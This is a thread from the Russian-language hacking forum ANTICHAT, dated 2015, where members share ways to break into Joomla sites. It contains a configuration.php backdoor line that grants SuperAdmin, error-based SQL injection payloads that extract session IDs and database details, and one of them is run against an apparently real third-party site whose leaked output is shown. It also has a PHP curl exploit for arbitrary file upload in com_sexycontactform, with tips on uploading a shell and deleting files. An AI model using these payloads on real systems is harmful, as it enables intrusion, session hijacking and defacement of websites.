ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

13.02.2015, 14:00
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме: 69033
Репутация:
8
|
|
Бэкдорим Joomla через файл конфигурации штатными средствами:
в файл ./configuration.php добавляем строчку
Сообщение от None
public $root_user='';
Вписанный таким образом пользователь автоматически становится СуперАдмином, не смотря на его настройки в MySQL.
Вычитал тут
|
|
|

28.07.2015, 22:21
|
|
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме: 5301021
Репутация:
1879
|
|
Сообщение от ravencrow
ravencrow said:
↑
Как узнать версию Joomla 2.5/3.0
Если есть доступ на чтение из БД, выполнить следующий запрос:
select version_id from префикс_schemas where extension_id=700;
или
select manifest_cache from префикс_extensions where extension_id=700;
А не проще подставить к домену /language/en-GB/en-GB.xmlи узнать версию?
|
|
|

23.10.2015, 13:48
|
|
Новичок
Регистрация: 07.05.2009
Сообщений: 14
Провел на форуме: 44902
Репутация:
0
|
|
Joomla ver. 3.2/3.4.4
Уязвимый компонент /administrator/components/com_contenthistory/models/history.php
POC:
Сообщение от None
index.php?option=com_contenthistory&view=history&l ist[ordering]=&item_id=75&type_id=1&list[select]=(select 1 FROM(select count(*),concat((select (select concat(session_id)) FROM jml_session LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
Подробнее тут.
|
|
|

23.10.2015, 15:03
|
|
Познающий
Регистрация: 08.08.2009
Сообщений: 37
Провел на форуме: 162650
Репутация:
2
|
|
Начинаем марафон
|
|
|

27.10.2015, 13:08
|
|
Участник форума
Регистрация: 05.05.2007
Сообщений: 171
Провел на форуме: 1050662
Репутация:
435
|
|
Сообщение от ZodiaX
ZodiaX said:
↑
Joomla
ver. 3.2/3.4.4
Уязвимый компонент /administrator/components/com_contenthistory/models/history.php
POC
:
Подробнее
тут
.
А как только угадать префикс таблицы.
|
|
|

27.10.2015, 14:31
|
|
Новичок
Регистрация: 07.05.2009
Сообщений: 14
Провел на форуме: 44902
Репутация:
0
|
|
|
|
|

27.10.2015, 14:40
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме: 371875
Репутация:
137
|
|
Сообщение от Sharingan
Sharingan said:
↑
А как только угадать префикс таблицы.
Площадка для тестов:
_ttp://test.bip.visacom.pl/index.php?option=com_contenthistory&view=history&l ist[ordering]=&item_id=75&type_id=1&list[select]=(ExtractValue(1,(select concat_ws(0x3a,user(),version(),database()))))
Обратите внимание, что при ошибки выдается и префикс таблици:
Сообщение от None
500 - XPATH syntax error: '
@10.254.34.22:5.5.43-MariaDB-log
' SQL=SELECT (ExtractValue(1,(select concat_ws(0x3a,user(),version(),database())))),uc. name AS editor
FROM `cons9_ucm_history`
AS h LEFT JOIN cons9_users AS uc ON uc.id = h.editor_user_id WHERE `h`.`ucm_item_id` = 75 AND `h`.`ucm_type_id` = 1 ORDER BY `h`.`save_date`
|
|
|

09.11.2015, 15:14
|
|
Guest
Сообщений: n/a
Провел на форуме: 216062
Репутация:
231
|
|
|
|
|
|

09.11.2015, 20:49
|
|
Guest
Сообщений: n/a
Провел на форуме: 21252
Репутация:
15
|
|
Только чем такой хэш можно расшифровать ? Через session_id пробовал войти на паре сайтов - не вышло .
|
|
|
|

11.11.2015, 18:05
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме: 371875
Репутация:
137
|
|
Joomla com_sexycontactform Arbitrary File Upload Vulnerability
по мотивам _ http://0day.today/exploit/description/24518
exploit:
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"http://localhost"[/COLOR][COLOR="#007700"]; [/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"Z:\\home\\test\\www\\exp\\css.php"[/COLOR][COLOR="#007700"]; if([/COLOR][COLOR="#0000BB"]$curl[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]curl_init[/COLOR][COLOR="#007700"]() ) { [/COLOR][COLOR="#0000BB"]curl_setopt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$curl[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CURLOPT_URL[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#DD0000"]/components/com_sexycontactform/fileupload/index.php"[/COLOR][COLOR="#007700"]); [/COLOR][COLOR="#0000BB"]curl_setopt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$curl[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CURLOPT_RETURNTRANSFER[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]); [/COLOR][COLOR="#0000BB"]curl_setopt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$curl[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CURLOPT_POST[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]); @[/COLOR][COLOR="#0000BB"]curl_setopt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$curl[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CURLOPT_POSTFIELDS[/COLOR][COLOR="#007700"], array([/COLOR][COLOR="#DD0000"]"files"[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]"@"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"])); [/COLOR][COLOR="#0000BB"]curl_setopt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$curl[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CURLOPT_USERAGENT[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.2.15 Version/10.10'[/COLOR][COLOR="#007700"]); [/COLOR][COLOR="#0000BB"]$in[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]curl_exec[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$curl[/COLOR][COLOR="#007700"]); [/COLOR][COLOR="#0000BB"]curl_close[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$curl[/COLOR][COLOR="#007700"]); [/COLOR][COLOR="#FF8000"]//var_dump($in); [/COLOR][COLOR="#007700"]}
[/COLOR][/COLOR]
На разных площадках по разному расширения пропускает, для загрузки шелла, пробуйте играться с расширением
Для удаления какого либо файла из папки files
Используем метод
DELETE:
http://www.localhost/components/com_...file=.htaccess
Сорци уязвимой части компанента:
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|